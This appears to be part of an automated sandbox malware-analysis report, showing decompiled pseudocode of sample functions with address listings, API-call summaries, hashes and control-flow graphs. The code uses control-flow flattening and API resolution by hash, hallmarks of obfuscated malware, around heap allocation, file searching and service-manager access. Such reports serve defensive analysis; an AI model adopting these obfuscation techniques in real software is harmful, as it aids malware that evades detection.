                                                        0x00323947
                                                        0x0032393c
                                                        0x00323926
                                                        0x00000000
                                                        0x0032391b
                                                        0x00323a6e
                                                        0x00323ad6
                                                        0x00323ad8
                                                        0x00323adf
                                                        0x00323af2
                                                        0x00323af7
                                                        0x00323af7
                                                        0x00323b0b
                                                        0x00323b0d
                                                        0x00323b12
                                                        0x00323b17
                                                        0x00323b2a
                                                        0x00323b2f
                                                        0x00323b2f
                                                        0x00323b36
                                                        0x00323b38
                                                        0x00323b3f
                                                        0x00323b52
                                                        0x00323b57
                                                        0x00323b57
                                                        0x00323b60
                                                        0x00323b62
                                                        0x00323b66
                                                        0x00000000
                                                        0x00323a70
                                                        0x00323a75
                                                        0x00000000
                                                        0x00323a77
                                                        0x00323a77
                                                        0x00323a7e
                                                        0x00323a91
                                                        0x00323a96
                                                        0x00323a96
                                                        0x00323aa1
                                                        0x00323aa5
                                                        0x00323aac
                                                        0x00000000
                                                        0x00323aac
                                                        0x00323a75
                                                        0x00000000

                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?), ref: 00323A48
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID: .
                                                        • API String ID: 1974802433-248832578
                                                        • Opcode ID: 1b3d1b21419dee0029035a9767b54c5825b50ee8738c9d1b445a739be9c70a08
                                                        • Instruction ID: c9d682b3b1052cd1531ab3e8c9b341998cce87fa43a2c2f10d3c6f8ee45b1d7c
                                                        • Opcode Fuzzy Hash: 1b3d1b21419dee0029035a9767b54c5825b50ee8738c9d1b445a739be9c70a08
                                                        • Instruction Fuzzy Hash: DC5124317042214BCB36AB68F845B7B36AA9B91700F11092DF496DB351EB7DCF458792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 586 325040-325057 587 32505c 586->587 588 325060-325066 587->588 589 3251af-3251b5 588->589 590 32506c 588->590 591 3251bb 589->591 592 3252f9-3252ff 589->592 593 325072-325078 590->593 594 325367-32536e 590->594 599 3251c1-3251c7 591->599 600 325277-32527e 591->600 595 325301-325308 592->595 596 3252e8-3252ee 592->596 601 32507a 593->601 602 3250f9-3250ff 593->602 597 325370-325386 call 323f00 call 323e60 594->597 598 32538b-325396 594->598 603 325325-325330 595->603 604 32530a-325320 call 323f00 call 323e60 595->604 612 3252f4 596->612 613 3253b9-3253c0 596->613 597->598 632 3253b3-3253b6 598->632 633 325398-3253ae call 323f00 call 323e60 598->633 606 32526d-325272 599->606 607 3251cd-3251d3 599->607 614 325280-325296 call 323f00 call 323e60 600->614 615 32529b-3252c5 600->615 608 3250c2-3250c9 601->608 609 32507c-325082 601->609 610 325153-32515a 602->610 611 325101-325107 602->611 653 325332-325348 call 323f00 call 323e60 603->653 654 32534d-32535b RtlAllocateHeap 603->654 604->603 606->588 607->596 620 3251d9-3251e0 607->620 616 3250e6-3250e9 608->616 617 3250cb-3250e1 call 323f00 call 323e60 608->617 625 325084-32508a 609->625 626 3250ad-3250c0 609->626 623 325177-325182 610->623 624 32515c-325172 call 323f00 call 323e60 610->624 611->596 621 32510d-325114 611->621 612->587 614->615 645 3252e2 615->645 646 3252c7-3252dd call 323f00 call 323e60 615->646 647 3250ef-3250f4 616->647 617->616 634 3251e2-3251f8 call 323f00 call 323e60 620->634 635 3251fd-32521f 620->635 636 325131-32514e 621->636 637 325116-32512c call 323f00 call 323e60 621->637 668 325184-32519a call 323f00 call 323e60 623->668 669 32519f-3251aa 623->669 624->623 625->596 641 325090-3250ab call 3242c0 625->641 626->588 632->613 633->632 634->635 635->647 677 325225-32522c 635->677 636->587 637->636 641->587 645->596 646->645 647->587 653->654 654->613 670 32535d-325362 654->670 668->669 669->587 670->587 687 325249-325268 677->687 688 32522e-325244 call 323f00 call 323e60 677->688 687->588 688->687
                                                        C-Code - Quality: 61%
                                                        			E00325040(intOrPtr __ecx, intOrPtr __edx) {
                                                        				char _v4;
                                                        				char _v8;
                                                        				char _v12;
                                                        				intOrPtr _v16;
                                                        				intOrPtr _v20;
                                                        				intOrPtr _v24;
                                                        				void* _v28;
                                                        				void* _v36;
                                                        				intOrPtr _v44;
                                                        				signed int _v52;
                                                        				void* _v68;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t16;
                                                        				void* _t17;
                                                        				void* _t23;
                                                        				void* _t26;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t35;
                                                        				void* _t37;
                                                        				void* _t41;
                                                        				void* _t42;
                                                        				void* _t45;
                                                        				void* _t50;
                                                        				void* _t51;
                                                        				void* _t52;
                                                        				signed int _t53;
                                                        				void* _t58;
                                                        				intOrPtr* _t101;
                                                        				void* _t103;
                                                        				signed int _t104;
                                                        				void* _t105;
                                                        				void* _t107;
                                                        				void* _t108;
                                                        				void* _t112;
                                                        				void* _t115;
                                                        				void* _t116;
                                                        
                                                        				_t101 = _v12;
                                                        				_t58 = 0;
                                                        				_v16 = __edx;
                                                        				_t112 = 0;
                                                        				_v20 = __ecx;
                                                        				_t104 = 0x1ca940c1;
                                                        				while(1) {
                                                        					_t16 = _v28;
                                                        					while(1) {
                                                        						L2:
                                                        						_t115 = _t104 - 0x12f72f95;
                                                        						if(_t115 <= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _t104 - 0x26342ffd;
                                                        						if(__eflags > 0) {
                                                        							__eflags = _t104 - 0x2fab56c4;
                                                        							if(_t104 != 0x2fab56c4) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t17 =  *0x32e494;
                                                        								__eflags = _t17;
                                                        								if(_t17 == 0) {
                                                        									_t17 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x7facde30, _t112);
                                                        									 *0x32e494 = _t17;
                                                        								}
                                                        								_t105 =  *_t17();
                                                        								__eflags =  *0x32dd18;
                                                        								if( *0x32dd18 == 0) {
                                                        									 *0x32dd18 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x9ff0609c, _t112);
                                                        								}
                                                        								_t16 = RtlAllocateHeap(_t105, 8, 0x20000); // executed
                                                        								_t58 = _t16;
                                                        								__eflags = _t58;
                                                        								if(_t58 != 0) {
                                                        									_t104 = 0x8956eec;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(__eflags == 0) {
                                                        								_t23 =  *0x32e484;
                                                        								__eflags = _t23;
                                                        								if(_t23 == 0) {
                                                        									_t23 = E00323E60(_t58, E00323F00(0x26f5757c), 0x9e91db81, _t112);
                                                        									 *0x32e484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x32e18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E00323E60(_t58, E00323F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x32e18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x32e29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E00323E60(_t58, E00323F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x32e29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x32de08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E00323E60(_t58, E00323F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x32de08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x32e494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x32e494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x32df30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x32df30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x32e494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x32e494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x32df30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00323E60(_t58, E00323F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x32df30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x32e270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E00323E60(_t58, E00323F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x32e270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x32e200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E00323E60(_t58, E00323F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x32e200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E003242C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x00325047
                                                        0x0032504b
                                                        0x0032504d
                                                        0x00325051
                                                        0x00325053
                                                        0x00325057
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00325060
                                                        0x00325060
                                                        0x00325060
                                                        0x00325066
                                                        0x00000000
                                                        0x00000000
                                                        0x003251af
                                                        0x003251b5
                                                        0x003252f9
                                                        0x003252ff
                                                        0x00000000
                                                        0x00325301
                                                        0x00325301
                                                        0x00325306
                                                        0x00325308
                                                        0x0032531b
                                                        0x00325320
                                                        0x00325320
                                                        0x00325327
                                                        0x0032532e
                                                        0x00325330
                                                        0x00325348
                                                        0x00325348
                                                        0x00325355
                                                        0x00325357
                                                        0x00325359
                                                        0x0032535b
                                                        0x0032535d
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00000000
                                                        0x0032505c
                                                        0x0032505c
                                                        0x0032535b
                                                        0x003251bb
                                                        0x003251bb
                                                        0x00325277
                                                        0x0032527c
                                                        0x0032527e
                                                        0x00325291
                                                        0x00325296
                                                        0x00325296
                                                        0x003252ac
                                                        0x003252b0
                                                        0x003252b2
                                                        0x003252bd
                                                        0x003252c3
                                                        0x003252c5
                                                        0x003252d8
                                                        0x003252dd
                                                        0x003252dd
                                                        0x003252e6
                                                        0x00000000
                                                        0x003251c1
                                                        0x003251c1
                                                        0x003251c7
                                                        0x0032526d
                                                        0x00000000
                                                        0x003251cd
                                                        0x003251cd
                                                        0x003251d3
                                                        0x003252e8
                                                        0x003252e8
                                                        0x003252ee
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00000000
                                                        0x0032505c
                                                        0x0032505c
                                                        0x003251d9
                                                        0x003251d9
                                                        0x003251de
                                                        0x003251e0
                                                        0x003251f3
                                                        0x003251f8
                                                        0x003251f8
                                                        0x0032521b
                                                        0x0032521d
                                                        0x0032521f
                                                        0x003250ef
                                                        0x003250ef
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00000000
                                                        0x0032505c
                                                        0x00325225
                                                        0x00325225
                                                        0x0032522a
                                                        0x0032522c
                                                        0x0032523f
                                                        0x00325244
                                                        0x00325244
                                                        0x00325249
                                                        0x0032524e
                                                        0x0032525b
                                                        0x0032525d
                                                        0x0032525f
                                                        0x00325261
                                                        0x00325265
                                                        0x00000000
                                                        0x00325265
                                                        0x00000000
                                                        0x0032521f
                                                        0x003251d3
                                                        0x003251c7
                                                        0x003251bb
                                                        0x003253c0
                                                        0x003253c0
                                                        0x00000000
                                                        0x003253c0
                                                        0x0032506c
                                                        0x00325367
                                                        0x0032536c
                                                        0x0032536e
                                                        0x00325381
                                                        0x00325386
                                                        0x00325386
                                                        0x0032538d
                                                        0x0032538f
                                                        0x00325394
                                                        0x00325396
                                                        0x003253a9
                                                        0x003253ae
                                                        0x003253ae
                                                        0x00000000
                                                        0x003253b7
                                                        0x00325072
                                                        0x00325078
                                                        0x003250f9
                                                        0x003250ff
                                                        0x00325153
                                                        0x00325158
                                                        0x0032515a
                                                        0x0032516d
                                                        0x00325172
                                                        0x00325172
                                                        0x00325179
                                                        0x0032517b
                                                        0x00325180
                                                        0x00325182
                                                        0x00325195
                                                        0x0032519a
                                                        0x0032519a
                                                        0x003251a3
                                                        0x003251a5
                                                        0x00000000
                                                        0x00325101
                                                        0x00325101
                                                        0x00325107
                                                        0x00000000
                                                        0x0032510d
                                                        0x0032510d
                                                        0x00325112
                                                        0x00325114
                                                        0x00325127
                                                        0x0032512c
                                                        0x0032512c
                                                        0x00325139
                                                        0x0032513b
                                                        0x0032513d
                                                        0x0032514b
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00000000
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00325107
                                                        0x0032507a
                                                        0x0032507a
                                                        0x003250c2
                                                        0x003250c7
                                                        0x003250c9
                                                        0x003250dc
                                                        0x003250e1
                                                        0x003250e1
                                                        0x003250ed
                                                        0x00000000
                                                        0x0032507c
                                                        0x00325082
                                                        0x003250ad
                                                        0x003250b0
                                                        0x003250b2
                                                        0x003250ba
                                                        0x00000000
                                                        0x00325084
                                                        0x0032508a
                                                        0x00000000
                                                        0x00325090
                                                        0x0032509a
                                                        0x003250a8
                                                        0x0032505c
                                                        0x0032505c
                                                        0x00000000
                                                        0x0032505c
                                                        0x0032505c
                                                        0x0032508a
                                                        0x00325082
                                                        0x0032507a
                                                        0x00000000
                                                        0x00325078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,00328AC8,?,3251FEFE,?,?), ref: 00325355
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 5ef7a4bdde2ccb203f36da6931c72b884a57ee6e93a140d23d93589da494f387
                                                        • Instruction ID: 136c0dd83d50c03ae8143d45864cb0f2f0c462b6be72575ebc18d4131d3e205e
                                                        • Opcode Fuzzy Hash: 5ef7a4bdde2ccb203f36da6931c72b884a57ee6e93a140d23d93589da494f387
                                                        • Instruction Fuzzy Hash: FC810632B447309BDB22AF79BC8272A36DEAB94740F52042DF811DF295EA34DE054BC1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        C-Code - Quality: 73%
                                                        			E00329860() {
                                                        				char _v524;
                                                        				unsigned int _v528;
                                                        				char _v536;
                                                        				void* _v544;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t28;
                                                        				void* _t29;
                                                        				void* _t31;
                                                        				void* _t37;
                                                        				void* _t39;
                                                        				void* _t40;
                                                        				void* _t47;
                                                        				void* _t49;
                                                        				void* _t50;
                                                        				void* _t53;
                                                        				void* _t56;
                                                        				intOrPtr* _t60;
                                                        				intOrPtr _t62;
                                                        				void* _t64;
                                                        				void* _t69;
                                                        				void* _t72;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				intOrPtr _t94;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        
                                                        				_t64 = 0;
                                                        				_t28 = 0x29f9e503;
                                                        				_t92 = _v528;
                                                        				_t2 = _t64 + 1; // 0x1
                                                        				_t94 = _t2;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t97 = _t28 - 0x13fee53b;
                                                        						if(_t97 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t97 == 0) {
                                                        							__eflags =  *0x32e310;
                                                        							if( *0x32e310 == 0) {
                                                        								 *0x32e310 = E00323E60(_t64, E00323F00(0x26f5757c), 0x9ba7cd1, _t94);
                                                        							}
                                                        							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                        							_t92 = _t49;
                                                        							__eflags = _t92;
                                                        							if(_t92 == 0) {
                                                        								_t28 = 0x23c48583;
                                                        							} else {
                                                        								_t50 =  *0x32e54c; // 0x8fdff0
                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x32dbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E00323E60(_t64, E00323F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x32dbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x32e54c; // 0x8fdff0
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E00327C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x32e3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x32e3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E00323D00( &_v536);
                                                        											_t72 =  *0x32e54c; // 0x8fdff0
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x32dbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E00323E60(_t64, E00323F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x32dbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x32e54c; // 0x8fdff0
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E00323040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x32e494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x32e494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x32dd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E00323E60(_t64, E00323F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x32dd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x32e54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E00327E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x32e18c;
                                                        								if( *0x32e18c == 0) {
                                                        									 *0x32e18c = E00323E60(_t64, E00323F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x32e54c; // 0x8fdff0
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x327e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x00329868
                                                        0x0032986a
                                                        0x00329871
                                                        0x00329875
                                                        0x00329875
                                                        0x00329878
                                                        0x00329880
                                                        0x00329880
                                                        0x00329880
                                                        0x00329880
                                                        0x00329885
                                                        0x00000000
                                                        0x00000000
                                                        0x0032988b
                                                        0x00329993
                                                        0x00329995
                                                        0x003299ad
                                                        0x003299ad
                                                        0x003299bb
                                                        0x003299bd
                                                        0x003299bf
                                                        0x003299c1
                                                        0x003299d8
                                                        0x003299c3
                                                        0x003299c3
                                                        0x003299c8
                                                        0x003299ce
                                                        0x003299ce
                                                        0x00000000
                                                        0x00329891
                                                        0x00329891
                                                        0x00329896
                                                        0x00329936
                                                        0x0032993b
                                                        0x00000000
                                                        0x00329941
                                                        0x00329941
                                                        0x00329947
                                                        0x00329949
                                                        0x00329961
                                                        0x00329963
                                                        0x00329963
                                                        0x00329969
                                                        0x0032997d
                                                        0x0032997f
                                                        0x00329981
                                                        0x00329986
                                                        0x00000000
                                                        0x00329986
                                                        0x0032989c
                                                        0x0032989c
                                                        0x00329927
                                                        0x0032992c
                                                        0x00000000
                                                        0x003298a2
                                                        0x003298a7
                                                        0x00329905
                                                        0x0032990d
                                                        0x00329912
                                                        0x0032991a
                                                        0x00000000
                                                        0x003298a9
                                                        0x003298ae
                                                        0x00000000
                                                        0x003298b4
                                                        0x003298b4
                                                        0x003298bb
                                                        0x003298ce
                                                        0x003298d3
                                                        0x003298d3
                                                        0x003298e4
                                                        0x003298ea
                                                        0x003298ef
                                                        0x003298f5
                                                        0x003298fb
                                                        0x00000000
                                                        0x003298fb
                                                        0x003298ae
                                                        0x003298a7
                                                        0x0032989c
                                                        0x00329896
                                                        0x00000000
                                                        0x0032988b
                                                        0x003299e2
                                                        0x003299e7
                                                        0x00329ae3
                                                        0x00329ae8
                                                        0x00329b02
                                                        0x00329b07
                                                        0x00329b09
                                                        0x00329b1c
                                                        0x00329b21
                                                        0x00329b21
                                                        0x00329b33
                                                        0x00329b35
                                                        0x00329b3e
                                                        0x00329b3e
                                                        0x00329b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003299ed
                                                        0x003299ed
                                                        0x00329a73
                                                        0x00329a78
                                                        0x00329a7a
                                                        0x00329a8d
                                                        0x00329a92
                                                        0x00329a92
                                                        0x00329a99
                                                        0x00329a9b
                                                        0x00329aa0
                                                        0x00329aa2
                                                        0x00329ab5
                                                        0x00329aba
                                                        0x00329aba
                                                        0x00329ac7
                                                        0x00329ac9
                                                        0x00329ace
                                                        0x00329ad0
                                                        0x00329b4f
                                                        0x00329b58
                                                        0x00329ad2
                                                        0x00329ad2
                                                        0x00329ad9
                                                        0x00000000
                                                        0x00329ad9
                                                        0x003299f3
                                                        0x003299f3
                                                        0x003299f8
                                                        0x00329a47
                                                        0x00329a49
                                                        0x00329a61
                                                        0x00329a61
                                                        0x00329a67
                                                        0x00329a69
                                                        0x00000000
                                                        0x003299fa
                                                        0x003299fa
                                                        0x003299ff
                                                        0x00000000
                                                        0x00329a05
                                                        0x00329a05
                                                        0x00329a0d
                                                        0x00329a12
                                                        0x00329a17
                                                        0x00329a1f
                                                        0x00329a24
                                                        0x00329a2c
                                                        0x00329a31
                                                        0x00329a38
                                                        0x00000000
                                                        0x00329a38
                                                        0x003299ff
                                                        0x003299f8
                                                        0x003299ed
                                                        0x00000000
                                                        0x00329aea
                                                        0x00329aea
                                                        0x00329aea
                                                        0x00329b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,008FDFD8), ref: 0032997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003299BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00329A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00329B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$Y4[0
                                                        • API String ID: 2382770032-4131004879
